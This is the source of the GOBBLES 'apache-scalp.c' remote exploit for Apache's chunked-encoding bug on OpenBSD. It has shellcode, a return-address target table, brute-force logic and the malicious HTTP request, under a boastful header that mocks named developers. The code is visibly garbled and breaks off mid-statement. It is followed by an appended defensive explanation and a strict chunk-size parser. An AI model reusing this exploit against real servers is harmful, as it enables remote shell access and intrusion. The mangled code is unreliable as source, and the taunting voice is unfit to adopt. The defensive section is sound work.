/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 * BLING! BLING! - BRUTE FORCE CAPABILITIES - BLING! BLING!
 *
 * "... and Doug Sniff said it was a hole in Epic."
 *
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *   - Can not be exploited on 32-bit *nix variants
 *   - Is only exploitable on win32 platforms
 *   - Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *   Sun Solaris 6-8 (sparc/x86)
 *   FreeBSD 4.3-4.5 (x86)
 *   OpenBSD 2.6-3.1 (x86)
 *   Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: , ,
 *
 * Abusing the right syscalls, any exploit against OpenBSD = root. Kernel
 * bugs are great.
 *
 * #!GOBBLES QUOTES
 *   - you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh...not exploitable...ill do it after
 *     the weekend"
 *   - "Five years without a remote hole in the default install". default
 *     package = kernel. if theo knew that talkd was exploitable, he'd cry.
 *   - so funny how claims it's impossible to exploit this.
 *   - how many times were we told, "ANTISEC IS NOT FOR YOU" ?
 *   - I hope Theo doesn't kill himself
 *   - heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots. slashdot hippies.
 *   - they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesnt even
 *     work. it's just looking for win32 apache versions
 *   - no one took us seriously when we mentioned this last year. we warned
 *     them that moderation = no pie.
 *   - now try it against synnergy :>
 *   - ANOTHER BUG BITE THE DUST. VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx this thing is a major exploit. do you really wanna publish it?
 * oooo i'm not afraid of whitehats
 * xxxx the blackhats will kill you for posting that exploit
 * oooo blackhats are a myth
 * oooo so i'm not worried
 * oooo i've never seen one
 * oooo i guess it's sort of like having god in your life
 * oooo i don't believe there's a god
 * oooo but if i sat down and met him
 * oooo i wouldn't walk away thinking
 * oooo "that was one hell of a special effect"
 * oooo so i suppose there very well could be a blackhat somewhere
 * oooo but i doubt it. i've seen whitehat-blackhats with their ethics
 *      and deep philosophy.
 *
 * GOBBLES POSERS/WANNABES
 *   - #!GOBBLESEFNET (none of us join here, but we've sniffed it)
 *   - superGOBBLES.NET (low-)
 *
 * GOBBLES Security
 * GOBBLES
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512
#define MEMCPY_s1_OW ADDR_DELTA -146
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'
#define PUT_STRING(s) memcpy(p, s, strlen(s); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;
#define SHELLCODE_LOCALPORT_OFF 30

char shellcode =
    "x89xe2x83xecx10x6ax10x54x52x6ax00x6ax00xb8x1f"
    "x00x00x00xcdx80x80x7ax01x02x75x0bx66x81x7ax02"
    "x42x41x75x03xebx0fx90xffx44x24x04x81x7cx24x04"
    "x00x01x00x00x75xdaxc7x44x24x08x00x00x00x00xb8"
    "x5ax00x00x00xcdx80xffx44x24x08x83x7cx24x08x03"
    "x75xeex68x0bx6fx6bx0bx81x34x24x01x00x00x01x89"
    "xe2x6ax04x52x6ax01x6ax00xb8x04x00x00x00xcdx80"
    "x68x2fx73x68x00x68x2fx62x69x6ex89xe2x31xc0x50"
    "x52x89xe1x50x51x52x50xb8x3bx00x00x00xcdx80xcc"

struct
    char *type;
    u_long retaddr;
targets = / hehe, yes theo, that say OpenBSD here!
    "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f ,
    "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa ,
    "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 ,
    "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 ,
    "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 ,
    "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a ,
    "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae ,
;

int main(int argc, char *argv)
    char *hostp, *portp;
    unsigned char buf512, *expbuf, *p;
    int i, j, lport;
    int sock;
    int bruteforce, owned, progress;
    u_long retaddr;
    struct sockaddr_in sin, from;

    if(argc != 3)
        printf("Usage: %s <target#|base address> <ip:port>n", argv0);
        printf(" Using targets:t./apache-scalp 3 :8080n");
        printf(" Using bruteforce:t./apache-scalp 0x8f000 :8080n");
        printf("n- - - Potential targets list - - n");
        printf("Target ID / Target specificationn");
        for(i = 0; i < sizeof(targets)/8; i+)
            printf("t%d / %sn", i, targetsi.type);
        return -1;

    hostp = strtok(argv2, ":");
    if(portp = strtok(NULL, ":") = NULL)
        portp = "80"

    retaddr = strtoul(argv1, NULL, 16);
    if(retaddr < sizeof(targets)/8)
        retaddr = targetsretaddr.retaddr;
        bruteforce = 0;
    else
        bruteforce = 1;

    srand(getpid();
    signal(SIGPIPE, SIG_IGN);

    for(owned = 0, progress = 0;retaddr += RET_ADDR_INC)
        /* skip invalid return adresses */
        i = retaddr & 0xff;
        if(i = 0x0a | i = 0x0d)
            retaddr+;
        else if(memchr(&retaddr, 0x0a, 4) | memchr(&retaddr, 0x0d, 4)
            continue;

        sock = socket(AF_INET, SOCK_STREAM, 0);
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(hostp);
        sin.sin_port = htons(atoi(portp);

        if(!progress)
            printf("n* Connecting. ");
        fflush(stdout);

        if(connect(sock, (struct sockaddr *) & sin, sizeof(sin) != 0)
            perror("connect()");
            exit(1);

        if(!progress)
            printf("connected!n");

        /* Setup the local port in our shellcode */
        i = sizeof(from);
        if(getsockname(sock, (struct sockaddr *) & from, &i) != 0)
            perror("getsockname()");
            exit(1);

        lport = ntohs(from.sin_port);
        shellcodeSHELLCODE_LOCALPORT_OFF + 1 = lport & 0xff;
        shellcodeSHELLCODE_LOCALPORT_OFF + 0 = (lport >> 8) & 0xff;

        p = expbuf = malloc(8192 + (PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + (PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR);

        PUT_STRING("GET / HTTP/1.1rnHost: apache-scalp.crn");

        for (i = 0; i < REP_SHELLCODE; i+)
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_3, PADDING_3);
            PUT_STRING(": ");
            PUT_BYTES(NOPCOUNT, NOP);
            memcpy(p, shellcode, sizeof(shellcode) - 1);
            p += sizeof(shellcode) - 1;
            PUT_STRING("rn");

        for (i = 0; i < REP_POPULATOR; i+)
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_1, PADDING_1);
            PUT_STRING(": ");
            for (j = 0; j < REP_RET_ADDR; j+)
                *p+ = retaddr & 0xff;
                *p+ = (retaddr >> 8) & 0xff;
                *p+ = (retaddr >> 16) & 0xff;
                *p+ = (retaddr >> 24) & 0xff;
            PUT_BYTES(REP_ZERO, 0);
            PUT_STRING("rn");

        PUT_STRING("Transfer-Encoding: chunkedrn");
        snprintf(buf, sizeof(buf) - 1, "rn%xrn", PADSIZE_2);
        PUT_STRING(buf);
        PUT_BYTES(PADSIZE_2, PADDING_2);
        snprintf(buf, sizeof(buf) - 1, "rn%xrn", MEMCPY_s1_OW ADDR_DELTA);
        PUT_STRING(buf);

        write(sock, expbuf, p - expbuf);

        progress+;
        if(progress%70) = 0)
            progress = 1;

        if(progress = 1)
            memset(buf, 0, sizeof(buf);
            sprintf(buf, "r* Currently using retaddr 0lx, length %u, localport %u", retaddr, (unsigned int)(p - expbuf), lport);
            memset(buf + strlen(buf), ' ', 74 - strlen(buf);
            puts(buf);
            if(bruteforce)
                putch
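The request the code above builds ends with `Transfer-Encoding: chunked` followed by two chunk-size lines written with `%x`: `PADSIZE_2` (5) and `MEMCPY_s1_OW ADDR_DELTA` (-146), which `%x` renders as `ffffff6e`. The bug class this relies on is the classic signed/unsigned length confusion: a chunk size accumulated into a signed 32-bit value goes negative, slips past a signed bound check, and then becomes an enormous length once it is cast for the copy. The C below is an added defensive example, not GOBBLES' code and not Apache's source: it models that naive path in simplified form beside a strict parser that bounds and validates the chunk-size line before the value can ever reach a copy length. The 1 MiB limit, the function names and the sample lines are assumptions for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limit on a single chunk (not from the page): 1 MiB. */
#define CHUNK_SIZE_MAX (1u << 20)

enum chunk_rc {
    CHUNK_OK        =  0,
    CHUNK_EMPTY     = -1,   /* no hex digits at all */
    CHUNK_OVERFLOW  = -2,   /* more than 8 hex digits: cannot fit 32 bits */
    CHUNK_TOO_LARGE = -3,   /* fits, but above CHUNK_SIZE_MAX */
    CHUNK_BAD_CHAR  = -4    /* junk after the digits (not ';', CR or LF) */
};

static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Simplified model of the vulnerable pattern (hypothetical, not Apache's
 * source): the chunk-size digits are accumulated into a 32-bit value that is
 * then treated as signed, so the exploit's "ffffff6e" (its %x rendering of
 * -146) comes back negative. */
static int32_t naive_chunk_size(const char *line)
{
    uint32_t n = 0;
    for (; hexval((unsigned char)*line) >= 0; line++)
        n = n * 16 + (uint32_t)hexval((unsigned char)*line);   /* wraps silently */
    return (int32_t)n;
}

/* Second half of the pattern: a signed "bigger than my buffer?" check lets a
 * negative size through, and the size_t cast a copy routine needs turns it
 * into an enormous length (SIZE_MAX - 145 for -146). */
static size_t naive_copy_len(int32_t chunk, int32_t bufsiz)
{
    int32_t len_to_read = (chunk > bufsiz) ? bufsiz : chunk;
    return (size_t)len_to_read;
}

/* Strict parser: unsigned, bounded, and rejects anything that does not look
 * like "<hexdigits>[;extension]" before the value can become a copy length. */
static int parse_chunk_size(const char *line, uint32_t *out)
{
    uint64_t n = 0;
    int ndigits = 0, d;

    while ((d = hexval((unsigned char)*line)) >= 0) {
        if (++ndigits > 8) return CHUNK_OVERFLOW;
        n = n * 16 + (uint64_t)d;
        line++;
    }
    if (ndigits == 0) return CHUNK_EMPTY;
    if (*line != '\0' && *line != ';' && *line != '\r' && *line != '\n')
        return CHUNK_BAD_CHAR;
    if (n > CHUNK_SIZE_MAX) return CHUNK_TOO_LARGE;
    *out = (uint32_t)n;
    return CHUNK_OK;
}

/* Convenience wrapper: the parsed size on success, otherwise the (negative)
 * chunk_rc code, so a caller can test a single return value. */
static int64_t parsed_size(const char *line)
{
    uint32_t v = 0;
    int rc = parse_chunk_size(line, &v);
    return rc == CHUNK_OK ? (int64_t)v : (int64_t)rc;
}

int main(void)
{
    /* Constructed sample chunk-size lines; the last two mirror what the
     * exploit above emits with "%x" for 5 and for -146. */
    const char *samples[] = { "1a;name=val\r\n", "0\r\n", "5\r\n", "ffffff6e\r\n" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int32_t naive = naive_chunk_size(samples[i]);
        int64_t strict = parsed_size(samples[i]);
        printf("%-14.*s naive=%11d copy_len=%20zu strict=%s\n",
               (int)strcspn(samples[i], "\r\n"), samples[i],
               naive, naive_copy_len(naive, 8192),
               strict >= 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

The strict parser refuses more than eight hex digits outright (so leading-zero padding past 32 bits is also rejected) and applies the size limit while the value is still unsigned, which is the property the naive path lacks; a request whose chunk-size line has eight digits with the high bit set, as the exploit's `ffffff6e` does, is therefore a useful thing to log and reject at the edge rather than a value any copy routine should ever see.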